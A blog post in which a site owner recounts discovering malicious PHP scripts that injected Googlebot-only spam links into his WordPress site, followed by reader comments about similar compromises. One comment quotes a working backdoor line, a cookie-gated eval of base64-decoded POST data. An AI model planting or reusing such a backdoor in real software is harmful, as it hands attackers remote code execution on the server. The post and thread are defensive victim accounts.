I feel exploited

Goddamnit! Someone, managed somehow to insert malicious php scripts into the site which were injecting invisible spam links to my content. Even more insidiously, those links were not injected to the html source of the page unless the browser user agent reported that it was a googlebot, making them all but impossible to see with a normal browser.

I was lucky to notice this because in the Google Webmaster tools I still had my site address added as www.dbzer0.com which was wrong as I’m not using the www. part anymore. Fortunately however, this allowed the site stats to show the keywords in the content instead of simply how people are linking to it, which made all the spam stand out.

Oh ouch!
WTF?

When I saw that my fist action was to do a search just to see if I was possibly looking at outdated data.  Unfortunately, the results were not uplifting.

Oh shi--
Oh shi--

This was not good. Looking at the cached copies of these pages, it was obvious that these links existed at least since the start of February which means that whatever is causing this, was added after my upgrade to WP2.7 or managed to remain active after it. The source code for the googlebot looked like this, when it should have been looking like this. The links were apparently pointing to redirection scripts in a cracked Movable Type based blog. I’ve fired an email to the author to advise him to take the site down but have heard nothing from him yet.

Take note people: If you’re not going to keep your site updated and patched, either take it down, or export it into pure html and let that stand. Don’t let your obsolete php and mysql setup running as that just invites people to turn your old site into a spam haven.

At this point I started looking around the interwebs in a bit of a panic as hate this kind of shit being associated with me. I couldn’t find anything exactly like what I had unfortunately. The only thing coming close that I found was this post which at least gave me some ideas on where to look.

I was able to discover 2 malicious php scripts residing in my wp-content folder. One was called cache.php and was on directy under /wp-content/ while the other was in the /wp-content/uploads and had a weirder name (can’t remember now). I summarily deleted them (although in retrospect I should have probably saved them for all of you to see) but I did notice the ironic comment inside, warning people not to copy them and pass them around.

I couldn’t find anything else after that but I was still not certain I was rid of the spam. A quick look through the google bot’s eyes showed me that the page didn’t return any spam results but that could also be because the script doing it is smart enough to recognise fake google agents. The only real way to find out if this still happens is to wait until Google indexes one of the spammed posts again and see if the spam links still appear.

As a precautionary measure, I also changed my WP password (as unlikely as it is that it would have been cracked through brute force) and looked around for anything that can help me discover such stuff in the future. I did find a plugin that looks very promising in this regard but unfortunately due to the way it asks for RAM and the setup of my host’s php, I can’t allocate enough memory for it to run. A last precaution was to add a search alert for these keywords appearing on my site which will, if I get cracked in the future again, give me notice within a few days.

On a more positive note, hopefully by removing these huge-ass scripts (many hundreds of line of code each) perhaps the load on my server will be reduced as well. But I’d be happy even if I simply see these keywords disappear from the Webmaster tools soon.

Reblog this post [with Zemanta]

7 thoughts on “I feel exploited

  1. Same thing happened to me in December. Ultimately we discovered and removed a malicious cookie in Base64 encoding, and a few other suspicious lines of code in various places in the WP directories. It looked like this, and was in the WP Functions:

    ?php if(md5($_COOKIE['1f60b26d0e9d30c0'])=="b5472fb0f04c764e3af6d5af1c126bf2"){ eval(base64_decode($_POST['file'])); exit; } ?php

    The hosting company also said, "There was also some .cache files that had the php shell inside (removed)."

    There were some other things, i think you mentioned in the mysql, etc… It was a pretty serious hack.

    It was a pain in the ass, and took a while to finally resolve everything, although my pagerank hasn't gone back to the "4" that was before.

  2. I think this is a different crack. I've seen this on the wordpress fora where it was basically everywhere and very difficult to purge manually. Fortunately I don't think I have the same thing as I didn't have the same symptoms. We'll see in the future.

    I also need to remember which UNIX command will go through my text files looking for lines of code and run it manually to see what it returns.

  3. grep? find?

    It's a pretty rude feeling getting cracked, no matter what form it takes. Hopefully no lasting damage was done.

    Sounds like the exploitation of a bug – only upgrading to a version which fixes the bug will fix the problem, as it wouldn't need passwords to operate. Post-exploit detection/scanning is at best a bandaid solution, and at worst, providing a false sense of security – really you want a solution that doesn't need any intervention, or what you really need is for the code to be safe itself. We're all too used to 'it doesn't work, upgrade/restart', but this isn't really the way it should be with software.

    It's been a long long time since i looked at php — i still have the scars — but boy, it looks like it's ripe for abuse. Allows remote import of code? Great idea there – just what were they thinking. I am wary of anything written in php, basically because if the programmers were experienced they wouldn't be using it (there are better alternatives out there). And inexperienced programmers generally don't write secure code (no matter what language it's in, but some languages make it easier to make dangerous mistakes).

    A 2-teir web application has too many opportunities for exploitable bugs to creep in to start with, let alone with all of the additional opportunities to shoot yourself in the foot that php provides.

    1. Thanks Michael, I hope that no lasting damage was done as well (there doesn't seem to be any). The good thing about modern crackers is that they care more about profit than about damage. Thus they will keep their exploits as discreet as possible in order not to alert the owner. Thus, one gets at least a working site even while cracked.

      I think the exploit for me happened a while ago, and the scripts remained in the subsequent upgrades. Hopefully I'm not exploitable anymore but that remains to be seen.

  4. The hack was done at the server level. Same thing happened to me. Anyone hosting in Dallas/Fort Worth was a possible target. There were python scripts executed with root permissions that added code to a lot of pages.

    I'm pretty sure you got zapped with the same stuff. If you're on shared hosting, it's likely your box got rooted.

  5. Thanks Dixie, do you perchance have more information on this? I can then forward it to my provider

Comments are closed.